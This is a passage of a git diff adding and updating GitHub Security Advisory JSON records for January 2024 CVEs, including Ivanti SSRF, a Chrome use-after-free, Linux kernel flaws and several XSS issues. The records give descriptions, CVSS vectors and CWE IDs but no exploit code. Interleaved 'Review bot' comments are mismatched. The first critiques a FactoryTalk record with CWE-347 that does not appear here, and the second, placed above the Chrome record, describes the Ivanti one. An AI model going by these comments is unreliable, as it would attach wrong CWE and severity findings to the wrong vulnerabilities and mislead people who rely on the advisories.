index 0000000000000..858006343af51
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5rr9-mqhj-7cr2/GHSA-5rr9-mqhj-7cr2.json
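Review bot: `cwe_ids` lists `"CWE-347"` (improper verification of a cryptographic signature), yet the `details` text says the problem is the lack of any digital signing between the FTSP service token and the directory, which reads more like a missing binding/authentication check (CWE-287 or CWE-306) than a flawed verification; it is worth confirming which CWE the CNA assigned in the SD1660 advisory before this record is reviewed. The vector `AV:N/AC:L/PR:N/UI:N` with `C:H/I:H/A:H` is consistent with the `"severity": "CRITICAL"` label, but with `affected` empty no FactoryTalk Service Platform version can be matched from this record.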
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5rr9-mqhj-7cr2",
+ "modified": "2024-01-31T18:31:26Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2024-21893"
+ ],
+ "details": "A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21893"
+ },
+ {
+ "type": "WEB",
+ "url": "https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5rrq-v3j5-cwgm/GHSA-5rrq-v3j5-cwgm.json b/advisories/unreviewed/2024/01/GHSA-5rrq-v3j5-cwgm/GHSA-5rrq-v3j5-cwgm.json
new file mode 100644
index 0000000000000..c7b2be950166b
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-5rrq-v3j5-cwgm/GHSA-5rrq-v3j5-cwgm.json
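Review bot: The only vendor reference, `https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-...`, is titled for `CVE-2024-21888`, not for this record's `CVE-2024-21893`; if it is the joint Ivanti article covering both issues that is acceptable, but it should be confirmed and a 21893-specific KB added if one exists, so the link is not read as a wrong cross-reference. The score is `CVSS:3.0` while the sibling records in this commit use `CVSS:3.1`; presumably that is what the CNA supplied, but tooling that normalises on 3.1 should expect it. `affected` is empty even though `details` names the 9.x and 22.x lines of Connect Secure and Policy Secure, so an unauthenticated SSRF in the SAML component cannot yet be matched to an installed version from this record.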
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5rrq-v3j5-cwgm",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-01-31T00:30:18Z",
+ "aliases": [
+ "CVE-2024-1059"
+ ],
+ "details": "Use after free in Peer Connection in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High)",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1059"
+ },
+ {
+ "type": "WEB",
+ "url": "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://crbug.com/1514777"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T22:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json b/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json
index 0e44454fc2ca0..94ee1c3fb7040 100644
--- a/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json
+++ b/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5v7q-gqff-9cj8", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2023-51042" ], "details": "In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json b/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json index 034485bb79965..e4483528911eb 100644 --- a/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json +++ b/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6253-5q75-wc4w", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-23348" ], "details": "Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" 
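Review bot: In the `@@ -31,7 +34,7 @@` hunk of `GHSA-6253-5q75-wc4w` the `cwe_ids` array stays empty even though the `details` text describes arbitrary JavaScript execution via a crafted SVG upload, which maps naturally to CWE-79 (with CWE-434 for the upload path); NVD presumably had not assigned a CWE at this modification time, but an empty array means CWE-based filtering will miss the record. The new vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` is unusually high for script execution in a viewer's browser and carries `UI:N`, which stored XSS normally does not, so it is worth checking whether the scorer treated this as server-side code execution before the derived `"severity": "HIGH"` is relied on. `affected` also remains empty although the text gives exact fixed versions (3.1.7, 3.0.29, 2.11.58, 2.10.50) that could populate it once reviewed.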
diff --git a/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json b/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json index 660e466c9d56f..4c071c72a09c9 100644 --- a/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json +++ b/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-627f-4vcr-fmq4", - "modified": "2024-01-22T00:30:19Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-22T00:30:19Z", "aliases": [ "CVE-2024-23744" ], "details": "An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-21T23:15:44Z" diff --git a/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json b/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json index ac2ee5379a3e1..6065929f90b25 100644 --- a/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json +++ b/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-116", "CWE-117" ], "severity": "LOW", diff --git a/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json b/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json index c1107ee6eb2a2..e072740615142 100644 --- a/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json +++ b/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-63fx-c7fv-hgj5", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23849" ], "details": "In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23849" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/" + }, { "type": "WEB", "url": "https://lore.kernel.org/netdev/1705715319-19199-1-git-send-email-sharath.srinivasan%40oracle.com/" @@ -29,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json b/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json index fa94cc2576f22..5b845ffa5bcd4 100644 --- a/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json +++ b/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-663j-9vv5-mmf4", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T18:31:36Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51887" ], "details": "Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-682j-m7jh-pj2w/GHSA-682j-m7jh-pj2w.json b/advisories/unreviewed/2024/01/GHSA-682j-m7jh-pj2w/GHSA-682j-m7jh-pj2w.json new file mode 100644 index 0000000000000..64f08fd3f6919 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-682j-m7jh-pj2w/GHSA-682j-m7jh-pj2w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-682j-m7jh-pj2w", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2023-50357" + ], + "details": "A cross site scripting vulnerability in the AREAL SAS Websrv1 ASP website allows a remote low-privileged attacker to gain escalated privileges of other non-admin users.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50357" + }, + { + "type": "WEB", + "url": "https://www.areal-topkapi.com/en/services/security-bulletins" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T11:15:08Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json b/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json index 3fd7e41067080..3de687eaef511 100644 --- a/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json +++ b/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-692m-3mc5-vrjq", - "modified": "2024-01-26T00:30:30Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-26T00:30:30Z", "aliases": [ "CVE-2024-23626" diff --git a/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json b/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json index 02990d4152702..1bdd2965cc07d 100644 --- a/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json +++ b/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-6fjc-2q3r-pj6j/GHSA-6fjc-2q3r-pj6j.json b/advisories/unreviewed/2024/01/GHSA-6fjc-2q3r-pj6j/GHSA-6fjc-2q3r-pj6j.json new file mode 100644 index 0000000000000..c5f87c9d560e0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6fjc-2q3r-pj6j/GHSA-6fjc-2q3r-pj6j.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fjc-2q3r-pj6j", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-22648" + ], + "details": "A Blind SSRF vulnerability exists in the \"Crawl Meta Data\" functionality of SEO Panel version 4.10.0. This makes it possible for remote attackers to scan ports in the local environment.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22648" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22648" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json b/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json index 9221e61d1f7c2..e79a4716bd488 100644 --- a/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json +++ b/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6g54-284w-pj4p", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2024-23676" diff --git a/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json b/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json index f9cd34ca23af0..d35dd4b53eea8 100644 --- a/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json +++ b/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6grj-h983-99rg", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47199" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47193.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6j62-7qgg-9gww/GHSA-6j62-7qgg-9gww.json b/advisories/unreviewed/2024/01/GHSA-6j62-7qgg-9gww/GHSA-6j62-7qgg-9gww.json new file mode 100644 index 0000000000000..219fa4c0a3cd3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6j62-7qgg-9gww/GHSA-6j62-7qgg-9gww.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6j62-7qgg-9gww", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2023-40551" + ], + "details": "A flaw was found in the MZ binary format in Shim. An out-of-bounds read may occur, leading to a crash or possible exposure of sensitive data during the system's boot phase.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40551" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40551" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259918" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json b/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json index 176d34a1ea8fc..c39fa693215ce 100644 --- a/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json +++ b/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6jhr-xfqr-826m", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47200" ], "details": "A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47201.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json b/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json index d6a1f11238592..433f5164a1bfb 100644 --- a/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json +++ b/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6m93-gmrj-jf29", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-24399" ], "details": "An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6m95-c675-56r5/GHSA-6m95-c675-56r5.json b/advisories/unreviewed/2024/01/GHSA-6m95-c675-56r5/GHSA-6m95-c675-56r5.json new file mode 100644 index 0000000000000..a65add11526b8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6m95-c675-56r5/GHSA-6m95-c675-56r5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m95-c675-56r5", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-1018" + ], + "details": "A vulnerability classified as problematic has been found in PbootCMS 3.2.5-20230421. Affected is an unknown function of the file /admin.php?p=/Area/index#tab=t2. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252288.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1018" + }, + { + "type": "WEB", + "url": "https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252288" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252288" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/01/GHSA-6p59-4pch-3x39/GHSA-6p59-4pch-3x39.json b/advisories/unreviewed/2024/01/GHSA-6p59-4pch-3x39/GHSA-6p59-4pch-3x39.json new file mode 100644 index 0000000000000..b21ad3c15fa01 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6p59-4pch-3x39/GHSA-6p59-4pch-3x39.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p59-4pch-3x39", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22293" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andrea Tarantini BP Profile Search allows Reflected XSS.This issue affects BP Profile Search: from n/a through 5.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22293" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/bp-profile-search/wordpress-bp-profile-search-plugin-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json b/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json index a1e675d4cac8a..c13cd12ea4069 100644 --- a/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json +++ b/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6pp8-37pj-mhcc", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52325" ], "details": "A local file inclusion vulnerability in one of Trend Micro Apex Central's widgets could allow a remote attacker to execute arbitrary code on affected installations.\n\nPlease note: this vulnerability must be used in conjunction with another one to exploit an affected system. In addition, an attacker must first obtain a valid set of credentials on target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6ppv-xf37-rvx6/GHSA-6ppv-xf37-rvx6.json b/advisories/unreviewed/2024/01/GHSA-6ppv-xf37-rvx6/GHSA-6ppv-xf37-rvx6.json new file mode 100644 index 0000000000000..9c2545939a833 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6ppv-xf37-rvx6/GHSA-6ppv-xf37-rvx6.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6ppv-xf37-rvx6", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-46050" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46050" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json b/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json index 36df4f6c12c76..63e16c0ec55b8 100644 --- a/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json +++ b/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": 